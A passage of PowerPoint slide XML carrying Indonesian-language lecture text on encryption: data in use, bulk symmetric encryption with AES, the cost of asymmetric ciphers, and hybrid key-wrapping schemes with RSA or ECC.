            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RAM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> register dan cache CPU.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> megabyte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gigabyte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>massal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>massal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Overhead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>isi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>massal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AES. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aliran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalahnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menantang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untungnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 128 bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 256 bit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akibatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebanyakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RSA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ECC. Bagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
